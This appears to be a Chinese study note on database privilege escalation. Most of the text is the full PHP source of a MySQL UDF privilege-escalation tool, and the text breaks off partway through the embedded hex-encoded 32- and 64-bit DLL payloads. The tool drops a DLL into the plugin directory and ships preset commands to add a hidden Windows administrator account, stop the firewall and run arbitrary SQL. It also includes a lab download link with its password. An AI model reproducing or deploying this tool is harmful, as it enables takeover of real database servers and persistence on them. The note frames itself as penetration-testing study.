数据库提权【笔记总结】

文章目录

  • UDF提权
      • 以有webshell
      • 只有数据库权限
        • 条件
        • 复现
          • msf工具
          • sql语句提权
  • MOF提权
        • 前言
        • 条件
        • 复现
          • msf工具
          • php脚本提权
  • sqlserver提权
      • 前言
      • 条件
      • xp_cmdshell提权
          • 复现
      • 沙盒提权
          • 介绍
          • 复现
  • Oracle提权
      • 靶场搭建
      • 执行任意命令
          • 复现
      • 通过注入存储过程提权(低权限提升至DBA)
          • 原理
          • 利用条件
          • 复现
  • PostgreSQl提权
      • 介绍
      • 复现
          • 创建函数提权
          • 高权限提权
            • 介绍
            • 影响版本
            • 复现

  1. 靶场地址:

    1.  mssql提权,oracle提权(仔细看使用说明,需要修改当前绑定IP)https://pan.baidu.com/s/13rdGmscjy-n_iUG1ZyW_Iw?pwd=cong解压密码:vmlwrtg%$^sdfgg administrator/abc123!

  2. UDF提权

    1. 以有webshell

      1. 通过webshell将脚本上传可访问路径

        1.  <?phpif (get_magic_quotes_gpc()) { function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; } $_POST = array_map('stripslashes_deep', $_POST); $_GET = array_map('stripslashes_deep', $_GET); $_COOKIE = array_map('stripslashes_deep', $_COOKIE); $_REQUEST = array_map('stripslashes_deep', $_REQUEST); } session_start();if($_GET['action']=='logout'){foreach($_COOKIE["connect"] as $key=>$value){setcookie("connect[$key]","",time()-1);}header("Location:".$_SERVER["SCRIPT_NAME"]);}if(!empty($_POST['submit'])){setcookie("connect[host]",$_POST['host']);setcookie("connect[name]",$_POST['name']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[db]",$_POST['db']);$_COOKIE["connect"]["host"];echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>暗月mysql全版本通杀提权神器(mOon原创)</title></head><body><form method="post" action="?action=connect"><table  border="1" align="center" width="300"><caption><h5>暗月mysql全版本通杀提权神器(mOon原创)</h5></caption><tr><td width="50">HOST:</td><td width="450"><input type="text" name="host" value="localhost" size="40"></td></tr><tr><td>NAME:</td><td><input type="text" name="name" value="root" size="40"></td></tr><tr><td>PASS:</td><td><input type="text" name="pass" value="" size="40"></td></tr><tr><td>DB:</td><td><input type="text" name="db" value="mysql" size="40"></td></tr><td colspan="2"><div align="center"><input type="submit" name="submit" value="提交"><input type="reset" name="Submit" value="重置"></div></td></table></form><div align="center"><strong>Copyright By mOon 2014</strong><br><span> <font color="red">黑客居家旅游杀人放火爆菊必备暗器</font></span><br>Blog:<a href="http://www.moonsec.com" target="_blank">www.moonsec.com</a> Bbs:<a href="http://www.moonsafe.com" target="_blank">www.moonsafe.com</a><a href="http://www.moonsec.com" target="_blank">版本更新</a></div></body></html><?phpexit;}echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';$link = mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);if(!$link){echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";exit;}else{echo "连接成功<br>";echo "版本信息:<br>";$str=mysql_get_server_info();echo 'MYSQL版本:'.$str."<br>";foreach(_ver() as $key=>$value){echo $key."-----".$value."<br>";} echo "<hr>";if($str[2]>=1){$pa=str_replace('\\','/',_dir());$path=$_SESSION['path']=$pa."/moonudf.dll";}else{$path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';}}$conn=mysql_select_db($_COOKIE["connect"]["db"],$link);if(!$conn){echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";exit;}else{echo "数据库--".$_COOKIE['connect']['db']."--存在<br>";}echo '<a href="?action=logout">点击退出</a><br>';echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';echo  '<table width="680" height="53" border="1">';echo    '<tr>';echo      '<td colspan="2">当前路径:';  echo      "<input name='p' type='text' size='100' value='".dirname(__FILE__)."\'></td>";echo    '</tr>';echo    '<tr>';echo     '<td width="235"><input type="file" name="file"></td>';echo      '<td width="46"><input type="submit" name="subfile" value="上传文件"></td>';echo    '</tr>';echo  '</table>';echo'</form>';if($_POST['subfile']){$upfile=$_POST['p'].$_FILES['file']['name'];if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){echo '上传失败';}else{echo '上传成功,路径为'.$upfile;}}}echo '<hr>';echo '选择UDF导出的版本 win32 & win64 默认32位';echo '<form action="?action=dll" method="post"/>';echo '<input type="radio" name="udf" value="32" checked="checked">win32&nbsp';echo '<input type="radio" name="udf" value="64">win64&nbsp';echo '<hr>';echo '<table cellpadding="1" cellspacing="2">';echo '<tr><td>路径目录为:</td></tr>';echo "<tr><td><input type='text' name='dll' size='100' value='$path'/></td>";echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';echo '</table>';echo '</form>'; echo '<hr>';if($_POST['subudf']){if($_POST['udf']=="32"){$shellcode=mysql86();}else{$shellcode=mysql64();}mysql_query('DROP TABLE Temp_udf');$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');if(!$query){echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();}else{$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";if(!mysql_query($query)){echo 'udf插入失败请查看失败内容'.mysql_error();}else{$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;if(!mysql_query($query)){echo 'udf导出失败请查看失败内容'.mysql_error();}else{mysql_query('DROP TABLE Temp_udf');echo '导出成功';}}}}echo '<form name="form2" method="post" action="">';echo  '<table width="680" height="100" border="1.2" cellpadding="0" cellspacing="1">';echo    '<tr>';echo      '<td width="100">文件路径:</td>';echo      '<td width="620"><input name="diy" type="text" id="diy" size="50"></td>';echo    '</tr>';echo    '<tr>';echo      '<td>目标路径:</td>';echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';echo    '</tr>';echo    '<tr>';echo      '<td colspan="2">';echo        '<div align="right">';echo          '<input type="submit" name="Submit2" value="自定义导出">';echo      '</div></td></tr>';echo '</table>';echo '</form>';if(!empty($_POST['diy'])){$diy=str_replace('\\','/',$_POST['diy']);$diypath=str_replace('\\','/',$_POST['diypath']);mysql_query('DROP TABLE diy_dll');$s='create table diy_dll (cmd LONGBLOB)';if(!mysql_query($s)){echo '创建diy_dll表失败'.mysql_error();}else{$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";if(!mysql_query($s)){echo "插入自定义文件失败".mysql_error();}else{$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";if(!mysql_query($s)){echo "导出自定义dll出错".mysql_error();}else{mysql_query('DROP TABLE diy_dll');echo "成功出自定义dll<br>";}}}}echo "<hr>";echo '自带命令:<br>';echo '<form action="" method="post">';echo '<select name="mysql">';echo '<option value="create function sys_eval returns string soname \'moonudf.dll\'">创建sys_eval</option>';echo '<option value="select sys_eval(\'net user moon$ 123456 /add & net localgroup administrators moon$ /add\')">添加超级管理员</option>';echo '<option value="select sys_eval(\'net user\')">查看用户</option>';echo '<option value="select sys_eval(\'netstat -an\')">查看端口</option>';echo '<option value="select sys_eval(\'net stop sharedacess\')">停止防火墙</option>';echo '<option value="select name from mysql.func">查看创建函数</option>';echo '<option value="delete from mysql.func where name=\'sys_eval\'">删除sys_eval</option>';echo '</select>';echo '&nbsp<input type="submit" value="提交" />';echo '</form>';echo '<form action="?action=sql" method="post">';echo '自定义SQL语句:<br>';echo '<textarea name="mysql" cols="90" rows="10"></textarea>';echo '&nbsp<input type="submit" value="执行" />';echo '</form>';echo "回显结果:<br>";echo '<textarea cols="90" rows="10" id="contactus" name="contactus">';if(!empty($_POST['mysql'])){echo "SQL语句:".$sql=$_POST['mysql']."\r\n";$sql=mysql_query($sql) or die(mysql_error());while($rows=@mysql_fetch_row($sql)){foreach($rows as $value){echo iconv("UTF-8", "GB2312//IGNORE",  $value);}}}echo '</textarea>';echo '<hr>';print("本版支持mysql win32 & win64位 提权但是少了某些提权功能,例如反弹函数。需要使用反弹函数 请使用以前的版本,但是不支持64位的mysql。");function _dir(){$sql="SHOW VARIABLES LIKE '%plugin_dir%'";$row=mysql_query($sql);$rows=mysql_fetch_row($row);return  $rows[1];}function _ver(){$_version=array();$sql="show variables like '%version%'";$row=mysql_query($sql);while($rows=mysql_fetch_row($row)){$_version += array($rows[0]=>$rows[1]);}return $_version;}function mysql86(){return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";}function mysql64(){return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D1B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF0300004C8BC78BD3488BCE488B5C2430488B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833